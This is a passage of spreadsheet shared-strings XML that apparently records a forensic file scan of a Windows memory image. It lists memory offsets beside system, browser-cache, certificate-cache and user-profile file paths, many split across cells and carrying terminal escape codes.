    <t>\Windows\System32\msdtcprx.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc78558</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc78928</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc78a50</t>
  </si>
  <si>
    <t>\Users\Support\Searches\Everywhere.search-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc78b48</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip Help.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc78f80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc79a28</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\rdpendp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc7a490</t>
  </si>
  <si>
    <t>0xdfc7a748</t>
  </si>
  <si>
    <t>0xdfc7b800</t>
  </si>
  <si>
    <t>0xdfc7c180</t>
  </si>
  <si>
    <t>0xdfc7c380</t>
  </si>
  <si>
    <t>0xdfc7c628</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc7c6e0</t>
  </si>
  <si>
    <t>0xdfc7c798</t>
  </si>
  <si>
    <t>0xdfc7d088</t>
  </si>
  <si>
    <t>0xdfc7d960</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1272D14A9AE60B5D738836642B</t>
  </si>
  <si>
    <t>2AA237_3D7896</t>
  </si>
  <si>
    <t>F3A8216763B</t>
  </si>
  <si>
    <t>D9BE49</t>
  </si>
  <si>
    <t>FA21C8EC1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc7da68</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc7e478</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\rdpcorets.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc7ebb8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5457A8CE4B2A7499F8299A013B</t>
  </si>
  <si>
    <t>0xdfc7f038</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2F10234D936F04AB516AF66C39</t>
  </si>
  <si>
    <t>50D18C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc80038</t>
  </si>
  <si>
    <t>\Windows\System32\fveui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc80808</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet File</t>
  </si>
  <si>
    <t>s\counters.da</t>
  </si>
  <si>
    <t>0xdfc80948</t>
  </si>
  <si>
    <t>\Windows\System32\mlang.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc80a00</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\370A248B666D5DE4F59E191C6F</t>
  </si>
  <si>
    <t>E4E7CF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc81368</t>
  </si>
  <si>
    <t>\Windows\System32\imaadp32.acm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc81588</t>
  </si>
  <si>
    <t>0xdfc82260</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DXJFQ9GW\d</t>
  </si>
  <si>
    <t>ivtip_small[1</t>
  </si>
  <si>
    <t>].gif_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc826a0</t>
  </si>
  <si>
    <t>\Windows\System32\AudioEng.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc827b8</t>
  </si>
  <si>
    <t>0xdfc82870</t>
  </si>
  <si>
    <t>0xdfc82a08</t>
  </si>
  <si>
    <t>0xdfc83268</t>
  </si>
  <si>
    <t>\Windows\System32\inetmib1.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc83658</t>
  </si>
  <si>
    <t>85AA5B_3E0896</t>
  </si>
  <si>
    <t>5F7725E887D</t>
  </si>
  <si>
    <t>AF4310</t>
  </si>
  <si>
    <t>3EE477450_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc84038</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\WmiApRpl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc84128</t>
  </si>
  <si>
    <t>0xdfc84420</t>
  </si>
  <si>
    <t>0xdfc84648</t>
  </si>
  <si>
    <t>00001.regtrans-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc84760</t>
  </si>
  <si>
    <t>0xdfc8f368</t>
  </si>
  <si>
    <t>\Windows\System32\cryptdlg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc8f970</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\5</t>
  </si>
  <si>
    <t>8b810[1].gif_x001B_</t>
  </si>
  <si>
    <t>0xdfc90290</t>
  </si>
  <si>
    <t>\Users\Support\Favorites\Links\Web Slice Gallery.url_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc90640</t>
  </si>
  <si>
    <t>\Windows\System32\msoert2.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc91038</t>
  </si>
  <si>
    <t>\Windows\System32\bitsperf.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc91120</t>
  </si>
  <si>
    <t>0xdfc91538</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0E5B83846ED89B039687803786</t>
  </si>
  <si>
    <t>DE6F9B_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc918e0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F5F320A94D4D2B4465D8F17E2BB</t>
  </si>
  <si>
    <t>0xdfc91998</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD87408</t>
  </si>
  <si>
    <t>8F3328_2908F6</t>
  </si>
  <si>
    <t>82DFC81A793</t>
  </si>
  <si>
    <t>BD240C</t>
  </si>
  <si>
    <t>F29711C77_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc93c10</t>
  </si>
  <si>
    <t>\Users\Support\Favorites\Links\Suggested Sites.url_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc93cc8</t>
  </si>
  <si>
    <t>0xdfc94198</t>
  </si>
  <si>
    <t>0xdfc94a58</t>
  </si>
  <si>
    <t>\Windows\System32\ActionCenter.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc96270</t>
  </si>
  <si>
    <t>0xdfc96370</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msadp32.acm.mui_x001B_[0K_x001B_[51G</t>
  </si>
  <si>
    <t>0xdfc964b8</t>
  </si>
  <si>
    <t>\Windows\System32\fdWSD.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc96978</t>
  </si>
  <si>
    <t>0xdfc96b90</t>
  </si>
  <si>
    <t>\Windows\System32\bthprops.cpl_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc973a0</t>
  </si>
  <si>
    <t>0xdfc976c8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\B</t>
  </si>
  <si>
    <t>BUwEY3[1].jpg</t>
  </si>
  <si>
    <t>0xdfc98438</t>
  </si>
  <si>
    <t>\Windows\System32\mssvp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc984f0</t>
  </si>
  <si>
    <t>0xdfc98670</t>
  </si>
  <si>
    <t>\Windows\System32\Syncreg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc993a0</t>
  </si>
  <si>
    <t>0xdfc99b40</t>
  </si>
  <si>
    <t>\Windows\System32\QAGENTRT.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc9af80</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E</t>
  </si>
  <si>
    <t>78E416_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc9bab8</t>
  </si>
  <si>
    <t>0xdfc9bf80</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\PS4FHBCF.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc9c7c8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1E11E75149C17A93653DA7DC0B</t>
  </si>
  <si>
    <t>8CF53F_D48103</t>
  </si>
  <si>
    <t>58A7E2CDC32</t>
  </si>
  <si>
    <t>8F5518</t>
  </si>
  <si>
    <t>26D93EDD4_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc9cd50</t>
  </si>
  <si>
    <t>0xdfc9d368</t>
  </si>
  <si>
    <t>\Windows\System32\webcheck.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc9e900</t>
  </si>
  <si>
    <t>\Users\sshd_server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command P</t>
  </si>
  <si>
    <t>rompt.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc9e9b8</t>
  </si>
  <si>
    <t>0xdfc9eb40</t>
  </si>
  <si>
    <t>0xdfc9ebf8</t>
  </si>
  <si>
    <t>0xdfc9f248</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\prnfldr.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc9f838</t>
  </si>
  <si>
    <t>0xdfc9f8f0</t>
  </si>
  <si>
    <t>\Users\Support\Favorites\Links for United States\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca0180</t>
  </si>
  <si>
    <t>0xdfca0598</t>
  </si>
  <si>
    <t>0xdfca0970</t>
  </si>
  <si>
    <t>\Program Files\Common Files\System\wab32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca0ab8</t>
  </si>
  <si>
    <t>\Windows\System32\msimg32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca1320</t>
  </si>
  <si>
    <t>\Windows\System32\srchadmin.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca1588</t>
  </si>
  <si>
    <t>qdefaultJSAE2</t>
  </si>
  <si>
    <t>53O.jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca1810</t>
  </si>
  <si>
    <t>6A5282_190B47</t>
  </si>
  <si>
    <t>ACABB836FED</t>
  </si>
  <si>
    <t>A0DB21</t>
  </si>
  <si>
    <t>5B091C566_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca1978</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Temp\ad_driver.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca1a30</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FC40DEC15EF80C8B4E0DBF2657</t>
  </si>
  <si>
    <t>02AC40_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca1f80</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3538626A1FCCCA43C7E18F220B</t>
  </si>
  <si>
    <t>DD9B02_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca2320</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\h</t>
  </si>
  <si>
    <t>0xdfca2598</t>
  </si>
  <si>
    <t>\Users\Support\Favorites\Links for United States\GobiernoUSA.gov.url_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca2808</t>
  </si>
  <si>
    <t>0xdfca38b8</t>
  </si>
  <si>
    <t>\Windows\System32\StructuredQuery.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca3b00</t>
  </si>
  <si>
    <t>\Windows\System32\netman.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca3dc8</t>
  </si>
  <si>
    <t>\Windows\System32\l3codeca.acm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca4398</t>
  </si>
  <si>
    <t>0xdfca4450</t>
  </si>
  <si>
    <t>0xdfca48f0</t>
  </si>
  <si>
    <t>\Users\Support\Contacts\Support.contact_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca5130</t>
  </si>
  <si>
    <t>0xdfca5298</t>
  </si>
  <si>
    <t>Э†_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca78b8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1F4BA66CDBFEC85A20E11BF7</t>
  </si>
  <si>
    <t>29AF23_AA85F8</t>
  </si>
  <si>
    <t>F9DAFF33153</t>
  </si>
  <si>
    <t>B5AEC2</t>
  </si>
  <si>
    <t>E983B94B6_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfca9260</t>
  </si>
  <si>
    <t>6A5282_3F92CB</t>
  </si>
  <si>
    <t>02676335B34</t>
  </si>
  <si>
    <t>209C5D</t>
  </si>
  <si>
    <t>8E30252B3_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcaaad0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9867366F8AEC2622FB3C0E620A</t>
  </si>
  <si>
    <t>546210_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcaacb8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF</t>
  </si>
  <si>
    <t>0xdfcab038</t>
  </si>
  <si>
    <t>0xdfcabbe8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight\Microsoft Silverlight</t>
  </si>
  <si>
    <t>0xdfcabd98</t>
  </si>
  <si>
    <t>\Windows\System32\FXSST.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcac3a8</t>
  </si>
  <si>
    <t>rlblockindex[</t>
  </si>
  <si>
    <t>1].bin_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcac640</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Internet Explorer\imagestore\70ajh0y\imagestore.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcac7a8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F5F320A94D4D2B4465D8F17E2B</t>
  </si>
  <si>
    <t>0xdfcac9d0</t>
  </si>
  <si>
    <t>92934B_C20E0D</t>
  </si>
  <si>
    <t>A2D0F89FE52</t>
  </si>
  <si>
    <t>6E1490</t>
  </si>
  <si>
    <t>F4A2EE5AB_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcacaf0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\d2d1.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcacca8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Y5MHK58\B</t>
  </si>
  <si>
    <t>BUtDZZ[1].jpg</t>
  </si>
  <si>
    <t>0xdfcae1d0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C86BD7751D53F10F65AAAD66BB</t>
  </si>
  <si>
    <t>DF33C7_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcae610</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C437972632A488222EA069E157</t>
  </si>
  <si>
    <t>2887C7_CB47AC</t>
  </si>
  <si>
    <t>91B566BFFD2</t>
  </si>
  <si>
    <t>D4D636</t>
  </si>
  <si>
    <t>7E644ECFF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcae830</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C3F6CB3C038E4087CC420A0573</t>
  </si>
  <si>
    <t>71D1EB_047A09</t>
  </si>
  <si>
    <t>DF9C0C8DF38</t>
  </si>
  <si>
    <t>F2250B</t>
  </si>
  <si>
    <t>FB0CEDC41_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcae998</t>
  </si>
  <si>
    <t>0xdfcb07c0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\35DDEDF268117918D1D277A171</t>
  </si>
  <si>
    <t>D8DF7B_CDB17D</t>
  </si>
  <si>
    <t>43FC6D9B699</t>
  </si>
  <si>
    <t>A44D54</t>
  </si>
  <si>
    <t>F093969B6_x001B_[0K_x001B_[47G</t>
  </si>
  <si>
    <t>0xdfcb0a80</t>
  </si>
  <si>
    <t>\Windows\System32\hhctrl.ocx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcb2590</t>
  </si>
  <si>
    <t>D8DF7B_B37E9A</t>
  </si>
  <si>
    <t>A8614ED1F32</t>
  </si>
  <si>
    <t>09C64E</t>
  </si>
  <si>
    <t>450313CF1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcb3038</t>
  </si>
  <si>
    <t>8CF53F_9B779C</t>
  </si>
  <si>
    <t>A17785741E5</t>
  </si>
  <si>
    <t>9DDE23352_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcb3a48</t>
  </si>
  <si>
    <t>8CF53F_EA4990</t>
  </si>
  <si>
    <t>673A067EE2A</t>
  </si>
  <si>
    <t>6D15C022C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcb5418</t>
  </si>
  <si>
    <t>0xdfcb5638</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcb5dd0</t>
  </si>
  <si>
    <t>0xdfcb6f80</t>
  </si>
  <si>
    <t>0xdfcb7290</t>
  </si>
  <si>
    <t>0xdfcb7498</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\s</t>
  </si>
  <si>
    <t>w[1].js_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcb7a58</t>
  </si>
  <si>
    <t>0xdfcb7da0</t>
  </si>
  <si>
    <t>0xdfcb7e58</t>
  </si>
  <si>
    <t>ols\Desktop.i</t>
  </si>
  <si>
    <t>0xdfcb81a0</t>
  </si>
  <si>
    <t>527E5F_08B8CC</t>
  </si>
  <si>
    <t>3799B50816F</t>
  </si>
  <si>
    <t>C5D3F6</t>
  </si>
  <si>
    <t>D07C553B5_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcb82c0</t>
  </si>
  <si>
    <t>D8DF7B_C044D7</t>
  </si>
  <si>
    <t>7A7DBFAD0E4</t>
  </si>
  <si>
    <t>BE2E0A</t>
  </si>
  <si>
    <t>E0477E572_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcb9a58</t>
  </si>
  <si>
    <t>\Users\Support\Favorites\Links for United States\USA.gov.url_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcb9da0</t>
  </si>
  <si>
    <t>\Users\Support\Searches\Indexed Locations.search-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcba3a8</t>
  </si>
  <si>
    <t>2D351_397E41A</t>
  </si>
  <si>
    <t>2F252913B14</t>
  </si>
  <si>
    <t>7EAF3F</t>
  </si>
  <si>
    <t>A1644BE8_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcba568</t>
  </si>
  <si>
    <t>8CF53F_876805</t>
  </si>
  <si>
    <t>6CE7114B4D4</t>
  </si>
  <si>
    <t>2DBC47</t>
  </si>
  <si>
    <t>7FED8AA33_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcba678</t>
  </si>
  <si>
    <t>\Program Files\Windows Defender\MpCmdRun.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcba7e8</t>
  </si>
  <si>
    <t>0xdfcbabd8</t>
  </si>
  <si>
    <t>0xdfcbb9c0</t>
  </si>
  <si>
    <t>0xdfcbbbf8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C</t>
  </si>
  <si>
    <t>9DD9E7_EFF9B9</t>
  </si>
  <si>
    <t>BA98DEAA773</t>
  </si>
  <si>
    <t>F261FA</t>
  </si>
  <si>
    <t>85A0B1771_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcbc180</t>
  </si>
  <si>
    <t>0xdfcbc238</t>
  </si>
  <si>
    <t>0xdfcbcb10</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\boost_filesystem-vc100-mt-1_49.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcbcc40</t>
  </si>
  <si>
    <t>0xdfcbce70</t>
  </si>
  <si>
    <t>0xdfcbcf80</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Speech Recognitio</t>
  </si>
  <si>
    <t>n.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcbd198</t>
  </si>
  <si>
    <t>0xdfcbfb20</t>
  </si>
  <si>
    <t>0xdfcbfbd8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088</t>
  </si>
  <si>
    <t>F3328_2908F68</t>
  </si>
  <si>
    <t>2DFC81A793B</t>
  </si>
  <si>
    <t>D240CF</t>
  </si>
  <si>
    <t>29711C77_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcc0758</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8ECBD5625E1E150E7744A6B512</t>
  </si>
  <si>
    <t>9C3C29_95AE81</t>
  </si>
  <si>
    <t>E1723E64D6C</t>
  </si>
  <si>
    <t>02AE39</t>
  </si>
  <si>
    <t>4450B4CEA_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcc0810</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\64DCC9872C5635B1B7891B30665</t>
  </si>
  <si>
    <t>E0558_5552C20</t>
  </si>
  <si>
    <t>A2631357820</t>
  </si>
  <si>
    <t>903FD3</t>
  </si>
  <si>
    <t>8A8C0F9F_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcc1278</t>
  </si>
  <si>
    <t>ontawesome-we</t>
  </si>
  <si>
    <t>bfont[1].eo</t>
  </si>
  <si>
    <t>0xdfcc1330</t>
  </si>
  <si>
    <t>query.jscroll</t>
  </si>
  <si>
    <t>pane.min[1]</t>
  </si>
  <si>
    <t>.js_x001B_[0</t>
  </si>
  <si>
    <t>0xdfcc2458</t>
  </si>
  <si>
    <t>0xdfcc2b98</t>
  </si>
  <si>
    <t>0xdfcc2d68</t>
  </si>
  <si>
    <t>0xdfcc41c0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3ERB3PXY\o</t>
  </si>
  <si>
    <t>penid-jquery[</t>
  </si>
  <si>
    <t>1].js_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcc47c0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sync Center.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcc4900</t>
  </si>
  <si>
    <t>0xdfcc4bf8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\r</t>
  </si>
  <si>
    <t>u_badge_web_g</t>
  </si>
  <si>
    <t>eneric[1].p</t>
  </si>
  <si>
    <t>ng_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcc6170</t>
  </si>
  <si>
    <t>0xdfcc6db0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0</t>
  </si>
  <si>
    <t>0xdfcc7130</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\i</t>
  </si>
  <si>
    <t>dsync[1].gif_x001B_</t>
  </si>
  <si>
    <t>0xdfcc74f0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FC5A820A001B41D68902E051F36</t>
  </si>
  <si>
    <t>A5282_78FFFBC</t>
  </si>
  <si>
    <t>554554E0795</t>
  </si>
  <si>
    <t>6C2156</t>
  </si>
  <si>
    <t>147548B2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcc75a8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Cookies\VNWG5K3R.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcc7790</t>
  </si>
  <si>
    <t>0xdfcc8c98</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E938</t>
  </si>
  <si>
    <t>0xdfcc9f80</t>
  </si>
  <si>
    <t>iAD0001.002_x001B_[</t>
  </si>
  <si>
    <t>0xdfccbda0</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E05</t>
  </si>
  <si>
    <t>0xdfcccb70</t>
  </si>
  <si>
    <t>0xdfccf5c0</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\adefs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcd0038</t>
  </si>
  <si>
    <t>0xdfcd01f0</t>
  </si>
  <si>
    <t>0xdfcd0648</t>
  </si>
  <si>
    <t>0xdfcd1580</t>
  </si>
  <si>
    <t>0xdfcd1ec8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Cookies\F8CEH36N.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcd1f80</t>
  </si>
  <si>
    <t>2D351_09F47CC</t>
  </si>
  <si>
    <t>97617A16090</t>
  </si>
  <si>
    <t>68D64E</t>
  </si>
  <si>
    <t>CDB9381D_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcd2ef0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0LDUT682\r</t>
  </si>
  <si>
    <t>ed_x[1]_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcd51e0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\852CH0Q4\u</t>
  </si>
  <si>
    <t>nnamed[9].jpg</t>
  </si>
  <si>
    <t>0xdfcd6e28</t>
  </si>
  <si>
    <t>0xdfcd9150</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\MSVCR100.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcd9250</t>
  </si>
  <si>
    <t>0xdfcd9358</t>
  </si>
  <si>
    <t>0xdfcd9b90</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Sqm\iesqmdata1.sqm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcd9d60</t>
  </si>
  <si>
    <t>\Users\Support\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8ECBD5625E1E150E7744A6B512</t>
  </si>
  <si>
    <t>0xdfcde2b8</t>
  </si>
  <si>
    <t>\Windows\System32\msdtcuiu.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcde570</t>
  </si>
  <si>
    <t>BUAgRS[1].jpg</t>
  </si>
  <si>
    <t>0xdfcdee00</t>
  </si>
  <si>
    <t>BUucAY[1].jpg</t>
  </si>
  <si>
    <t>0xdfcdeeb8</t>
  </si>
  <si>
    <t>BUyqwR[1].jpg</t>
  </si>
  <si>
    <t>0xdfcdf150</t>
  </si>
  <si>
    <t>\Windows\System32\ieapfltr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfcdf908</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0DA515F703BB9B49479E8697AD</t>
  </si>
  <si>
    <t>B0B955_7DC3E6</t>
  </si>
  <si>
    <t>33EDFAEFC3A</t>
  </si>
  <si>
    <t>A3C995</t>
  </si>
  <si>
    <t>52548EC2F_x001B_[0K</t>
